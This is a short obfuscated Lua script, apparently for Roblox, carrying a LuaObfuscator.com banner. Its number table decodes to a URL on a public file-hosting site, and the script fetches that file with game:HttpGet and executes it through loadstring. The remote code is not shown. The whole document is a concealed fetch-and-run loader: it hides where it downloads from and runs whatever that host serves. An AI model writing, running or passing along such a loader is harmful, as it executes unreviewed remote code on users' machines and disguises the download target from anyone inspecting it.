--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0={1526 -(378 + 1044) ,332 -216 ,116,112,29 + 86 ,935 -(282 + 595) ,43 + 4 ,47,1372 -(226 + 1044) ,457 -352 ,106 + 2 ,101,1072 -(892 + 65) ,46,181 -82 ,97,466 -(87 + 263) ,72 + 26 ,111,89 + 31 ,182 -136 ,293 -184 ,111,1098 -(915 + 82) ,133 -86 ,160 -38 ,122 -68 ,19 + 90 ,52 + 0 ,169 -115 ,103,64 -(10 + 8) ,323 -239 ,280 -192 ,84};local v1="";for v2=1 + 0 , #v0 do v1=v1   .. string.char(v0[v2]) ;end loadstring(game:HttpGet(v1))();
